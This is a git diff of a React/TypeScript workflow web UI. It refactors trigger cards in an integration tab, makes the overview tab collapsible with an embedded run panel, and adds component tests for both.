-              <Input value={String(source.host ?? '0.0.0.0')} onChange={(e) => updateSource({ host: e.target.value })} />
-            </Field>
-            <Field label="Port">
-              <Input
-                type="number"
-                min={1}
-                value={String(source.port ?? 5140)}
-                onChange={(e) => updateSource({ port: Math.max(1, Number.parseInt(e.target.value || '5140', 10)) })}
-              />
-            </Field>
-          </div>
-          <Field label="Input Key">
-            <Input value={inputKey} onChange={(e) => onChange(setTriggerInputKey(draft, e.target.value || 'syslog_message'))} />
-          </Field>
-        </div>
+        <SyslogTriggerFields
+          source={source}
+          inputKey={inputKey}
+          onSourceChange={updateSource}
+          onInputKeyChange={(key) => onChange(setTriggerInputKey(draft, key))}
+        />
       ) : null}
 
       {isAdapter ? (
@@ -878,10 +1608,13 @@ function TriggerEditor({
 function TriggersSection({
   workflow,
   onWorkflowUpdated,
+  onGuidePrompt,
 }: {
   workflow: Workflow;
   onWorkflowUpdated?: (updated: Workflow) => void;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
 }) {
+  const { t } = useTranslation('workflow');
   const [expanded, setExpanded] = useState(true);
   const [loading, setLoading] = useState(false);
   const [records, setRecords] = useState<WorkflowTriggerRecord[]>([]);
@@ -924,9 +1657,9 @@ function TriggersSection({
       setRecords(nextRecords);
       setPlugins(pluginRes.data ?? []);
 
-      const nextSelectedId: string | null = nextRecords.some((item) => item.trigger.id === preferredId)
-        ? (preferredId ?? null)
-        : nextRecords[0]?.trigger.id ?? null;
+      const nextSelectedId: string | null = preferredId && nextRecords.some((item) => item.trigger.id === preferredId)
+        ? preferredId
+        : null;
       setSelectedTriggerId(nextSelectedId);
       if (syncDraft) {
         const selected = nextRecords.find((item) => item.trigger.id === nextSelectedId)?.trigger ?? null;
@@ -963,9 +1696,7 @@ function TriggersSection({
     void refresh({ preferredId: null, syncDraft: true });
   }, [refresh]);
 
-  const selectedRecord = records.find((item) => item.trigger.id === selectedTriggerId) ?? null;
-
-  const selectTrigger = (triggerId: string) => {
+  const openTriggerConfig = (triggerId: string) => {
     if (!confirmDiscardIfDirty('当前 Trigger 有未保存修改，确认切换并放弃这些改动吗？')) {
       return;
     }
@@ -978,6 +1709,22 @@ function TriggersSection({
     setDirty(false);
   };
 
+  const toggleTriggerConfig = (triggerId: string) => {
+    if (selectedTriggerId === triggerId) {
+      if (!confirmDiscardIfDirty('当前 Trigger 有未保存修改，确认收起并放弃这些改动吗？')) {
+        return;
+      }
+      setSelectedTriggerId(null);
+      setDraft(null);
+      setError('');
+      setSuccess('');
+      setHint('');
+      setDirty(false);
+      return;
+    }
+    openTriggerConfig(triggerId);
+  };
+
   const createTrigger = async (type: WorkflowTriggerType) => {
     if (!workflowAPI.createTrigger) return;
     const disabledReason = getCreateDisabledReason(type);
@@ -1025,8 +1772,11 @@ function TriggersSection({
         enabled: !trigger.enabled,
       });
       setSuccess(!trigger.enabled ? 'Trigger 已启用' : 'Trigger 已停用');
+      const keepSelectedId = selectedTriggerId && records.some((item) => item.trigger.id === selectedTriggerId)
+        ? selectedTriggerId
+        : null;
       await Promise.all([
-        refresh({ preferredId: trigger.id, syncDraft: selectedTriggerId === trigger.id }),
+        refresh({ preferredId: keepSelectedId, syncDraft: selectedTriggerId === trigger.id }),
         syncWorkflowFromServer(),
       ]);
       if (selectedTriggerId === trigger.id && draft) {
@@ -1126,7 +1876,7 @@ function TriggersSection({
   return (
     <div className="border-b border-gray-100">
       <SectionHeader
-        title="集成"
+        title={t('detail.run.triggerSection')}
         expanded={expanded}
         onToggle={() => setExpanded((v) => !v)}
         badge={<span className="text-xs font-normal text-gray-500">{records.length} 个</span>}
@@ -1195,70 +1945,102 @@ function TriggersSection({
             </div>
           ) : (
             <>
-              {records.length > 1 ? (
+              {records.length > 0 ? (
                 <div className="space-y-2">
-                  {records.map(({ trigger, status }) => (
-                    <button
-                      key={trigger.id}
-                      type="button"
-                      onClick={() => selectTrigger(trigger.id)}
-                      className={`w-full rounded-xl border px-3 py-3 text-left transition-colors ${
-                        selectedTriggerId === trigger.id
-                          ? 'border-red-300 bg-red-50/40'
-                          : 'border-gray-200 hover:bg-gray-50'
-                      }`}
-                    >
-                      <div className="flex items-start justify-between gap-3">
-                        <div className="min-w-0 flex-1">
-                          <div className="flex items-center gap-2">
-                            <span className="truncate text-sm font-semibold text-gray-900">{trigger.name || trigger.id}</span>
-                            <span className="rounded-full bg-gray-100 px-2 py-0.5 text-[11px] text-gray-600">
-                              {triggerTypeLabel(trigger.type)}
-                            </span>
-                          </div>
-                          <div className="mt-1 truncate text-[11px] text-gray-500">{triggerSourceLabel(trigger)}</div>
-                          <div className="mt-1 truncate text-[11px] text-gray-400">ID: {trigger.id}</div>
-                          <div className="mt-2 flex flex-wrap items-center gap-2 text-[11px] text-gray-500">
-                            <span>{String(status?.state || (trigger.enabled ? 'ready' : 'stopped'))}</span>
-                            {status?.error ? <span className="text-red-600">{String(status.error)}</span> : null}
-                          </div>
-                        </div>
-                        <div className="flex items-start gap-2">
-                          <span className={`mt-0.5 inline-flex h-5 items-center rounded-full px-2 text-[11px] font-medium ${
-                            trigger.enabled ? 'bg-green-100 text-green-700' : 'bg-gray-100 text-gray-500'
-                          }`}>
-                            {trigger.enabled ? '启用' : '停用'}
-                          </span>
+                  {records.map(({ trigger, status }) => {
+                    const isSelected = selectedTriggerId === trigger.id;
+                    return (
+                      <div
+                        key={trigger.id}
+                        data-testid={`trigger-card-${trigger.id}`}
+                        className={`rounded-xl border bg-white transition-colors ${
+                          isSelected
+                            ? 'border-gray-300'
+                            : 'border-gray-200 hover:bg-gray-50'
+                        }`}
+                      >
+                        <div className="grid grid-cols-1 items-center gap-4 px-4 py-4 sm:grid-cols-[minmax(0,1fr)_276px]">
                           <button
                             type="button"
-                            onClick={(event) => {
-                              event.preventDefault();
-                              event.stopPropagation();
-                              void toggleTriggerEnabled(trigger);
-                            }}
-                            disabled={saving}
-                            className="inline-flex items-center gap-1 rounded-lg border border-gray-200 px-2 py-1 text-[11px] font-medium text-gray-700 hover:bg-white disabled:opacity-60"
+                            onClick={() => toggleTriggerConfig(trigger.id)}
+                            className="flex min-h-[82px] min-w-0 flex-col justify-between text-left"
                           >
-                            {trigger.enabled ? '停用' : '启用'}
+                            <div>
+                              <div className="truncate text-sm font-semibold text-gray-900">{trigger.name || trigger.id}</div>
+                              <div className="mt-1 truncate text-[11px] text-gray-500">{triggerSourceLabel(trigger)}</div>
+                              <div className="mt-1 truncate text-[11px] text-gray-400">ID: {trigger.id}</div>
+                            </div>
+                            <div className="mt-3 flex flex-wrap items-center gap-2">
+                              <CapabilityTypePill>{triggerTypeLabel(trigger.type)}</CapabilityTypePill>
+                              <EnabledStatusPill active={!!trigger.enabled} />
+                              {status?.error ? <span className="text-red-600">{String(status.error)}</span> : null}
+                            </div>
                           </button>
-                          <button
-                            type="button"
-                            aria-label={`删除 ${trigger.name || trigger.id}`}
-                            onClick={(event) => {
-                              event.preventDefault();
-                              event.stopPropagation();
+                          <div className={CARD_ACTION_GRID_CLASS}>
+                            <button
+                              type="button"
+                              onClick={() => toggleTriggerConfig(trigger.id)}
+                              aria-expanded={isSelected}
+                              className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                            >
+                              {isSelected ? <ChevronDown className="h-3.5 w-3.5" /> : <ChevronRight className="h-3.5 w-3.5" />}
+                              配置
+                            </button>
+                            <button
+                              type="button"
+                              onClick={() => {
+                                void toggleTriggerEnabled(trigger);
+                              }}
+                              disabled={saving}
+                              className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                            >
+                              {trigger.enabled ? <Square className="h-3.5 w-3.5" /> : <Play className="h-3.5 w-3.5" />}
+                              {trigger.enabled ? '停用' : '启用'}
+                            </button>
+                            <button
+                              type="button"
+                              aria-label={`删除 ${trigger.name || trigger.id}`}
+                              onClick={() => {
+                                void handleDeleteTrigger(trigger.id, trigger.name || trigger.id);
+                              }}
+                              disabled={deleting}
+                              className={CARD_ACTION_DANGER_BUTTON_CLASS}
+                            >
+                              <Trash2 className="h-3.5 w-3.5" />
+                              删除
+                            </button>
+                          </div>
+                        </div>
+                        {isSelected ? (
+                          <TriggerEditor
+                            workflow={workflow}
+                            workflowId={workflow.id}
+                            draft={draft}
+                            status={status as JsonObject | undefined}
+                            plugins={plugins}
+                            showIdentityHeader={false}
+                            embedded
+                            onGuidePrompt={onGuidePrompt}
+                            saving={saving}
+                            deleting={deleting}
+                            error={error}
+                            success={success}
+                            onChange={(next) => {
+                              setDraft(next);
+                              setDirty(true);
+                              setError('');
+                              setSuccess('');
+                            }}
+                            onDelete={() => {
                               void handleDeleteTrigger(trigger.id, trigger.name || trigger.id);
                             }}
-                            disabled={deleting}
-                            className="inline-flex items-center gap-1 rounded-lg border border-red-200 px-2 py-1 text-[11px] font-medium text-red-600 hover:bg-red-50 disabled:opacity-60"
-                          >
-                            <Trash2 className="w-3 h-3" />
-                            删除
-                          </button>
-                        </div>
+                            onSave={persistDraft}
+                            onRunOnce={draft?.type === 'schedule' ? runScheduleOnce : undefined}
+                          />
+                        ) : null}
                       </div>
-                    </button>
-                  ))}
+                    );
+                  })}
                 </div>
               ) : records.length === 0 ? (
                 <div className="rounded-xl border border-dashed border-gray-200 px-4 py-8 text-center text-xs text-gray-500">
@@ -1266,30 +2048,6 @@ function TriggersSection({
                 </div>
               ) : null}
 
-              {records.length > 0 ? (
-                <TriggerEditor
-                  workflowId={workflow.id}
-                  draft={draft}
-                  status={selectedRecord?.status as JsonObject | undefined}
-                  plugins={plugins}
-                  showIdentityHeader={records.length === 1}
-                  saving={saving}
-                  deleting={deleting}
-                  error={error}
-                  success={success}
-                  onChange={(next) => {
-                    setDraft(next);
-                    setDirty(true);
-                    setError('');
-                    setSuccess('');
-                  }}
-                  onDelete={() => {
-                    void handleDelete();
-                  }}
-                  onSave={persistDraft}
-                  onRunOnce={draft?.type === 'schedule' ? runScheduleOnce : undefined}
-                />
-              ) : null}
             </>
           )}
         </div>
@@ -1298,11 +2056,70 @@ function TriggersSection({
   );
 }
 
-export default function IntegrationTab({ workflow, onWorkflowUpdated }: IntegrationTabProps) {
+export default function IntegrationTab({ workflow, onWorkflowUpdated, onGuidePrompt }: IntegrationTabProps) {
+  const { t } = useTranslation('workflow');
+  const [config, setConfig] = useState<WorkflowIntegrationConfig | null>(null);
+  const [loadingConfig, setLoadingConfig] = useState(true);
+  const [configError, setConfigError] = useState('');
+
+  useEffect(() => {
+    let cancelled = false;
+    setLoadingConfig(true);
+    setConfigError('');
+    void workflowAPI.getConfig(workflow.id)
+      .then((response) => {
+        if (cancelled) return;
+        setConfig(response.data.config ?? null);
+      })
+      .catch((err: unknown) => {
+        if (cancelled) return;
+        setConfig(null);
+        setConfigError(extractErrorMessage(err, '加载发布配置失败'));
+      })
+      .finally(() => {
+        if (!cancelled) {
+          setLoadingConfig(false);
+        }
+      });
+    return () => {
+      cancelled = true;
+    };
+  }, [workflow.id]);
+
+  if (loadingConfig) {
+    return (
+      <div className="flex-1 min-h-0 overflow-y-auto">
+        <div className="p-4 flex items-center gap-2 text-xs text-gray-500">
+          <Loader2 className="w-3.5 h-3.5 animate-spin" />
+          正在读取发布配置...
+        </div>
+      </div>
+    );
+  }
+
+  const view = buildTemplateView(config);
+  const guideActions = buildPublishGuideActions(t, workflow, view);
+  const showGuide = Boolean(onGuidePrompt && guideActions.length > 0);
+
   return (
     <div className="flex-1 min-h-0 overflow-y-auto divide-y divide-gray-100">
-      <PublishSection workflowId={workflow.id} />
-      <TriggersSection workflow={workflow} onWorkflowUpdated={onWorkflowUpdated} />
+      {configError ? (
+        <div className="flex items-start gap-1.5 bg-red-50 px-4 py-3 text-xs text-red-600">
+          <AlertCircle className="w-3.5 h-3.5 mt-0.5 flex-shrink-0" />
+          <span>{configError}</span>
+        </div>
+      ) : null}
+      {showGuide ? (
+        <div className="p-4">
+          <PublishGuidePanel actions={guideActions} onGuidePrompt={onGuidePrompt} />
+        </div>
+      ) : null}
+      <PublishSection workflow={workflow} workflowId={workflow.id} onGuidePrompt={onGuidePrompt} />
+      <TriggersSection
+        workflow={workflow}
+        onWorkflowUpdated={onWorkflowUpdated}
+        onGuidePrompt={onGuidePrompt}
+      />
     </div>
   );
 }
diff --git a/webui/src/pages/WorkflowDetail/tabs/OverviewTab.test.tsx b/webui/src/pages/WorkflowDetail/tabs/OverviewTab.test.tsx
new file mode 100644
index 000000000..6e559e508
--- /dev/null
+++ b/webui/src/pages/WorkflowDetail/tabs/OverviewTab.test.tsx
@@ -0,0 +1,112 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { describe, expect, it, vi } from 'vitest';
+
+import OverviewTab from './OverviewTab';
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    i18n: { language: 'zh-CN' },
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        'detail.overview.configInfo': '信息',
+        'detail.overview.nodeCount': '节点数',
+        'detail.overview.nodesAndEdges': `${params?.nodes ?? 0} 个节点 / ${params?.edges ?? 0} 条边`,
+        'detail.overview.category': '分类',
+        'detail.overview.version': '版本',
+        'detail.overview.createdBy': '创建人',
+        'detail.overview.createdAt': '创建时间',
+        'detail.overview.updatedAt': '更新时间',
+        'detail.overview.workflowFiles': '工作流文件',
+        'detail.overview.run': '运行',
+        'detail.overview.runStats': '运行统计',
+        'detail.overview.totalCalls': '总调用次数',
+        'detail.overview.successRate': '成功率',
+        'detail.overview.avgRuntime': '平均耗时',
+        'detail.overview.errorCount': '失败次数',
+        'detail.overview.successTimes': `成功 ${params?.count ?? 0} 次`,
+        'detail.overview.errorTimes': `失败 ${params?.count ?? 0} 次`,
+        'detail.run.testSection': '测试运行',
+        'detail.run.historySection': '执行历史',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+vi.mock('./RunTab', () => ({
+  default: ({
+    embedded,
+    embeddedTabs,
+    hideSectionHeaders,
+  }: {
+    embedded?: boolean;
+    embeddedTabs?: boolean;
+    hideSectionHeaders?: boolean;
+  }) => (
+    <div
+      data-testid="embedded-run-tab"
+      data-embedded={String(Boolean(embedded))}
+      data-embedded-tabs={String(Boolean(embeddedTabs))}
+      data-hide-section-headers={String(Boolean(hideSectionHeaders))}
+    >
+      run tab
+    </div>
+  ),
+}));
+
+function makeWorkflow() {
+  return {
+    id: 'wf-1',
+    name: '测试工作流',
+    category: 'default',
+    status: 'draft' as const,
+    createdAt: 0,
+    updatedAt: 0,
+    stats: {
+      callCount: 3,
+      successCount: 2,
+      errorCount: 1,
+      totalRuntime: 6,
+      avgRuntime: 2,
+      thumbsUp: 0,
+      thumbsDown: 0,
+    },
+    workflowJson: {
+      start: 'node-1',
+      version: '1.0',
+      nodes: [{ id: 'node-1', type: 'start' }],
+      edges: [],
+    },
+  };
+}
+
+describe('OverviewTab', () => {
+  it('在概览内以可折叠区块承载信息和运行', async () => {
+    const user = userEvent.setup();
+
+    render(<OverviewTab workflow={makeWorkflow()} />);
+
+    expect(screen.getByRole('button', { name: '信息 1 个节点 / 0 条边' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: '运行 总调用次数 3 / 成功率 66.7% / 平均耗时 2.00s' })).toBeInTheDocument();
+    expect(screen.getByText('分类')).toBeInTheDocument();
+    expect(screen.getByText('.flocks/plugins/workflows/wf-1/workflow.json')).toBeInTheDocument();
+    expect(screen.getByText('.flocks/plugins/workflows/wf-1/workflow.md')).toBeInTheDocument();
+    expect(screen.getByText('运行统计')).toBeInTheDocument();
+
+    const runTab = screen.getByTestId('embedded-run-tab');
+    expect(runTab).toHaveAttribute('data-embedded', 'true');
+    expect(runTab).toHaveAttribute('data-embedded-tabs', 'true');
+    expect(runTab).toHaveAttribute('data-hide-section-headers', 'true');
+
+    await user.click(screen.getByRole('button', { name: '运行 总调用次数 3 / 成功率 66.7% / 平均耗时 2.00s' }));
+    expect(screen.queryByTestId('embedded-run-tab')).not.toBeInTheDocument();
+    expect(screen.queryByText('运行统计')).not.toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: '信息 1 个节点 / 0 条边' }));
+    expect(screen.queryByText('分类')).not.toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: '运行 总调用次数 3 / 成功率 66.7% / 平均耗时 2.00s' }));
+    expect(screen.getByText('运行统计')).toBeInTheDocument();
+  });
+});
diff --git a/webui/src/pages/WorkflowDetail/tabs/OverviewTab.tsx b/webui/src/pages/WorkflowDetail/tabs/OverviewTab.tsx
index 56a9b7b4d..eb6c7c786 100644
--- a/webui/src/pages/WorkflowDetail/tabs/OverviewTab.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/OverviewTab.tsx
@@ -1,14 +1,19 @@
+import { useState, type ReactNode } from 'react';
 import { useTranslation } from 'react-i18next';
-import { Workflow } from '@/api/workflow';
-import { Calendar, User, Tag, Activity, Clock, CheckCircle, XCircle, Layers } from 'lucide-react';
+import { Workflow, WorkflowExecution } from '@/api/workflow';
+import { Calendar, User, Tag, Activity, Clock, CheckCircle, XCircle, Layers, ChevronDown, ChevronRight, FileText } from 'lucide-react';
+import RunTab from './RunTab';
 
 interface OverviewTabProps {
   workflow: Workflow;
+  latestExecution?: WorkflowExecution | null;
+  onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
+  onExecutionSettled?: () => void;
 }
 
-function MetaRow({ icon, label, value }: { icon: React.ReactNode; label: string; value: React.ReactNode }) {
+function MetaRow({ icon, label, value }: { icon: ReactNode; label: string; value: ReactNode }) {
   return (
-    <div className="flex items-start gap-2.5 py-2.5 border-b border-gray-50 last:border-0">
+    <div className="flex items-start gap-2.5 py-2.5 border-b border-gray-100 last:border-0">
       <span className="text-gray-400 mt-0.5 flex-shrink-0">{icon}</span>
       <span className="text-xs text-gray-500 w-16 flex-shrink-0 pt-0.5">{label}</span>
       <span className="text-xs text-gray-800 font-medium flex-1 break-all">{value}</span>
@@ -18,18 +23,94 @@ function MetaRow({ icon, label, value }: { icon: React.ReactNode; label: string;
 
 function StatCard({ value, label, color }: { value: string | number; label: string; color: string }) {
   return (
-    <div className="bg-gray-50 rounded-lg p-3 text-center">
-      <div className={`text-xl font-bold ${color}`}>{value}</div>
-      <div className="text-xs text-gray-500 mt-0.5">{label}</div>
+    <div className="rounded-md border border-gray-100 bg-gray-50/70 px-2.5 py-2">
+      <div className="text-[11px] leading-4 text-gray-500">{label}</div>
+      <div className={`mt-0.5 text-sm font-semibold leading-5 tabular-nums ${color}`}>
+        {value}
+      </div>
     </div>
   );
 }
 
-export default function OverviewTab({ workflow }: OverviewTabProps) {
+function WorkflowFileList({ jsonPath, mdPath }: { jsonPath: string; mdPath: string }) {
+  return (
+    <div className="space-y-1.5 min-w-0">
+      <div className="min-w-0">
+        <span className="text-[11px] text-gray-400">workflow.json</span>
+        <code className="block mt-0.5 rounded bg-gray-50 px-2 py-1 text-[11px] leading-4 text-gray-700 break-all">
+          {jsonPath}
+        </code>
+      </div>
+      <div className="min-w-0">
+        <span className="text-[11px] text-gray-400">workflow.md</span>
+        <code className="block mt-0.5 rounded bg-gray-50 px-2 py-1 text-[11px] leading-4 text-gray-700 break-all">
+          {mdPath}
+        </code>
+      </div>
+    </div>
+  );
+}
+
+function CollapsibleSection({
+  title,
+  summary,
+  expanded,
+  onToggle,
+  children,
+}: {
+  title: string;
+  summary?: ReactNode;
+  expanded: boolean;
+  onToggle: () => void;
+  children: ReactNode;
+}) {
+  return (
+    <section className="border-b border-gray-100 last:border-b-0">
+      <button
+        type="button"
+        onClick={onToggle}
+        className="w-full flex items-center justify-between gap-3 px-4 py-3 text-left hover:bg-gray-50 transition-colors"
+      >
+        <div className="min-w-0">
+          <h3 className="text-sm font-semibold text-gray-900">{title}</h3>
+          {summary && (
+            <div className="mt-0.5 text-xs text-gray-400 truncate">
+              {summary}
+            </div>
+          )}
+        </div>
+        {expanded ? (
+          <ChevronDown className="w-4 h-4 text-gray-400 flex-shrink-0" />
+        ) : (
+          <ChevronRight className="w-4 h-4 text-gray-400 flex-shrink-0" />
+        )}
+      </button>
+      {expanded && (
+        <div className="px-4 pb-4">
+          {children}
+        </div>
+      )}
+    </section>
+  );
+}
+
+export default function OverviewTab({
+  workflow,
+  latestExecution = null,
+  onLatestExecutionChange,
+  onExecutionSettled,
+}: OverviewTabProps) {
   const { t, i18n } = useTranslation('workflow');
+  const [configExpanded, setConfigExpanded] = useState(true);
+  const [runExpanded, setRunExpanded] = useState(true);
   const { stats } = workflow;
   const successRate =
     stats.callCount > 0 ? ((stats.successCount / stats.callCount) * 100).toFixed(1) : '0';
+  const avgRuntime = `${stats.avgRuntime.toFixed(2)}s`;
+  const runSummary = `${t('detail.overview.totalCalls')} ${stats.callCount} / ${t('detail.overview.successRate')} ${successRate}% / ${t('detail.overview.avgRuntime')} ${avgRuntime}`;
+  const workflowDir = workflow.source === 'global'
+    ? `~/.flocks/plugins/workflows/${workflow.id}/`
+    : `.flocks/plugins/workflows/${workflow.id}/`;
 
   const locale = i18n.language;
   const createdAt = new Date(workflow.createdAt).toLocaleString(locale, {
@@ -48,73 +129,104 @@ export default function OverviewTab({ workflow }: OverviewTabProps) {
   });
 
   return (
-    <div className="flex flex-col gap-5 p-4 overflow-y-auto h-full">
-      {/* Metadata */}
-      <section>
-        <h3 className="text-xs font-semibold text-gray-400 uppercase tracking-wider mb-2">
-          {t('detail.overview.configInfo')}
-        </h3>
-        <div className="bg-white rounded-lg border border-gray-100 px-3">
-          <MetaRow
-            icon={<Layers className="w-3.5 h-3.5" />}
-            label={t('detail.overview.nodeCount')}
-            value={t('detail.overview.nodesAndEdges', {
-              nodes: workflow.workflowJson.nodes.length,
-              edges: workflow.workflowJson.edges.length,
-            })}
-          />
-          <MetaRow
-            icon={<Tag className="w-3.5 h-3.5" />}
-            label={t('detail.overview.category')}
-            value={workflow.category}
-          />
-          {workflow.workflowJson.version && (
+    <div className="h-full overflow-y-auto bg-white">
+      <CollapsibleSection
+        title={t('detail.overview.configInfo')}
+        summary={t('detail.overview.nodesAndEdges', {
+          nodes: workflow.workflowJson.nodes.length,
+          edges: workflow.workflowJson.edges.length,
+        })}
+        expanded={configExpanded}
+        onToggle={() => setConfigExpanded(v => !v)}
+      >
+        <div className="space-y-4">
+          <div className="divide-y divide-gray-100">
             <MetaRow
-              icon={<Activity className="w-3.5 h-3.5" />}
-              label={t('detail.overview.version')}
-              value={workflow.workflowJson.version}
+              icon={<Layers className="w-3.5 h-3.5" />}
+              label={t('detail.overview.nodeCount')}
+              value={t('detail.overview.nodesAndEdges', {
+                nodes: workflow.workflowJson.nodes.length,
+                edges: workflow.workflowJson.edges.length,
+              })}
             />
-          )}
-          {workflow.createdBy && (
             <MetaRow
-              icon={<User className="w-3.5 h-3.5" />}
-              label={t('detail.overview.createdBy')}
-              value={workflow.createdBy}
+              icon={<Tag className="w-3.5 h-3.5" />}
+              label={t('detail.overview.category')}
+              value={workflow.category}
             />
-          )}
-          <MetaRow
-            icon={<Calendar className="w-3.5 h-3.5" />}
-            label={t('detail.overview.createdAt')}
-            value={createdAt}
-          />
-          <MetaRow
-            icon={<Clock className="w-3.5 h-3.5" />}
-            label={t('detail.overview.updatedAt')}
-            value={updatedAt}
-          />
+            {workflow.workflowJson.version && (
+              <MetaRow
+                icon={<Activity className="w-3.5 h-3.5" />}
+                label={t('detail.overview.version')}
+                value={workflow.workflowJson.version}
+              />
+            )}
+            {workflow.createdBy && (
+              <MetaRow
+                icon={<User className="w-3.5 h-3.5" />}
+                label={t('detail.overview.createdBy')}
+                value={workflow.createdBy}
+              />
+            )}
+            <MetaRow
+              icon={<Calendar className="w-3.5 h-3.5" />}
+              label={t('detail.overview.createdAt')}
+              value={createdAt}
+            />
+            <MetaRow
+              icon={<Clock className="w-3.5 h-3.5" />}
+              label={t('detail.overview.updatedAt')}
+              value={updatedAt}
+            />
+            <MetaRow
+              icon={<FileText className="w-3.5 h-3.5" />}
+              label={t('detail.overview.workflowFiles')}
+              value={(
+                <WorkflowFileList
+                  jsonPath={`${workflowDir}workflow.json`}
+                  mdPath={`${workflowDir}workflow.md`}
+                />
+              )}
+            />
+          </div>
         </div>
-      </section>
+      </CollapsibleSection>
 
-      {/* Run statistics */}
-      <section>
-        <h3 className="text-xs font-semibold text-gray-400 uppercase tracking-wider mb-2">
-          {t('detail.overview.runStats')}
-        </h3>
-        <div className="grid grid-cols-2 gap-2">
-          <StatCard value={stats.callCount}                         label={t('detail.overview.totalCalls')} color="text-gray-900" />
-          <StatCard value={`${successRate}%`}                       label={t('detail.overview.successRate')} color="text-green-600" />
-          <StatCard value={`${stats.avgRuntime.toFixed(2)}s`}       label={t('detail.overview.avgRuntime')} color="text-red-600" />
-          <StatCard value={stats.errorCount}                        label={t('detail.overview.errorCount')} color="text-red-500" />
-        </div>
-        {stats.callCount > 0 && (
-          <div className="mt-2 flex items-center gap-2 text-xs text-gray-500">
-            <CheckCircle className="w-3.5 h-3.5 text-green-500" />
-            <span>{t('detail.overview.successTimes', { count: stats.successCount })}</span>
-            <XCircle className="w-3.5 h-3.5 text-red-400 ml-2" />
-            <span>{t('detail.overview.errorTimes', { count: stats.errorCount })}</span>
+      <CollapsibleSection
+        title={t('detail.overview.run')}
+        summary={runSummary}
+        expanded={runExpanded}
+        onToggle={() => setRunExpanded(v => !v)}
+      >
+        <div className="mb-3">
+          <h4 className="mb-1.5 text-[11px] font-semibold text-gray-400">
+            {t('detail.overview.runStats')}
+          </h4>
+          <div className="grid grid-cols-2 gap-1.5">
+            <StatCard value={stats.callCount}                   label={t('detail.overview.totalCalls')} color="text-gray-900" />
+            <StatCard value={`${successRate}%`}                 label={t('detail.overview.successRate')} color="text-green-600" />
+            <StatCard value={avgRuntime}                        label={t('detail.overview.avgRuntime')} color="text-red-600" />
+            <StatCard value={stats.errorCount}                  label={t('detail.overview.errorCount')} color="text-red-500" />
           </div>
-        )}
-      </section>
+          {stats.callCount > 0 && (
+            <div className="mt-2 flex flex-wrap items-center gap-x-2 gap-y-1 text-[11px] text-gray-500">
+              <CheckCircle className="h-3 w-3 text-green-500" />
+              <span>{t('detail.overview.successTimes', { count: stats.successCount })}</span>
+              <XCircle className="h-3 w-3 text-red-400" />
+              <span>{t('detail.overview.errorTimes', { count: stats.errorCount })}</span>
+            </div>
+          )}
+        </div>
+        <RunTab
+          workflow={workflow}
+          latestExecution={latestExecution}
+          onLatestExecutionChange={onLatestExecutionChange}
+          onExecutionSettled={onExecutionSettled}
+          embedded
+          embeddedTabs
+          hideSectionHeaders
+        />
+      </CollapsibleSection>
     </div>
   );
 }
diff --git a/webui/src/pages/WorkflowDetail/tabs/RunTab.test.tsx b/webui/src/pages/WorkflowDetail/tabs/RunTab.test.tsx
index 231f77f28..9c349e52b 100644
--- a/webui/src/pages/WorkflowDetail/tabs/RunTab.test.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/RunTab.test.tsx
@@ -246,4 +246,49 @@ describe('RunTab', () => {
     });
   });
 
+  it('expands history execution details directly under the clicked item', async () => {
+    const user = userEvent.setup();
+    const executions = [
+      {
+        id: 'exec-first',
+        workflowId: 'wf-1',
+        inputParams: {},
+        outputResults: { marker: 'first' },
+        status: 'success' as const,
+        startedAt: new Date('2026-01-01T00:00:00Z').getTime(),
+        duration: 1,
+        executionLog: [],
+      },
+      {
+        id: 'exec-second',
+        workflowId: 'wf-1',
+        inputParams: {},
+        outputResults: { marker: 'second' },
+        status: 'success' as const,
+        startedAt: new Date('2026-01-02T00:00:00Z').getTime(),
+        duration: 2,
+        executionLog: [],
+      },
+    ];
+    workflowAPI.getHistory.mockResolvedValue({ data: executions });
+
+    render(
+      <RunTab
+        workflow={baseWorkflow}
+        latestExecution={null}
+        sections={['history']}
+      />,
+    );
+
+    const firstHistoryButton = (await screen.findByText('1.0s')).closest('button');
+    const secondHistoryButton = (await screen.findByText('2.0s')).closest('button');
+    expect(firstHistoryButton).not.toBeNull();
+    expect(secondHistoryButton).not.toBeNull();
+
+    await user.click(firstHistoryButton!);
+
+    const firstDetail = screen.getByText(/"marker": "first"/);
+    expect(firstDetail.compareDocumentPosition(secondHistoryButton!) & Node.DOCUMENT_POSITION_FOLLOWING).toBeTruthy();
+  });
+
 });
diff --git a/webui/src/pages/WorkflowDetail/tabs/RunTab.tsx b/webui/src/pages/WorkflowDetail/tabs/RunTab.tsx
index 59f505945..ae818e1a5 100644
--- a/webui/src/pages/WorkflowDetail/tabs/RunTab.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/RunTab.tsx
@@ -19,8 +19,14 @@ interface RunTabProps {
   latestExecution: WorkflowExecution | null;
   onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
   onExecutionSettled?: () => void;
+  sections?: RunTabSection[];
+  embedded?: boolean;
+  embeddedTabs?: boolean;
+  hideSectionHeaders?: boolean;
 }
 
+export type RunTabSection = 'test' | 'history';
+
 function getExecutionDisplayStatus(execution?: WorkflowExecution | null): string {
   if (!execution) return 'unknown';
   if (execution.status === 'running' && execution.currentPhase) {
@@ -49,18 +55,24 @@ function SectionHeader({
   expanded,
   onToggle,
   badge,
+  embedded = false,
 }: {
   title: string;
   expanded: boolean;
   onToggle: () => void;
   badge?: React.ReactNode;
+  embedded?: boolean;
 }) {
   return (
     <button
       onClick={onToggle}
-      className="w-full flex items-center justify-between px-4 py-3 bg-gray-50 border-b border-gray-100 hover:bg-gray-100 transition-colors text-left"
+      className={`w-full flex items-center justify-between transition-colors text-left ${
+        embedded
+          ? 'px-3 py-2.5 bg-white border-b border-gray-100 hover:bg-gray-50'
+          : 'px-4 py-3 bg-gray-50 border-b border-gray-100 hover:bg-gray-100'
+      }`}
     >
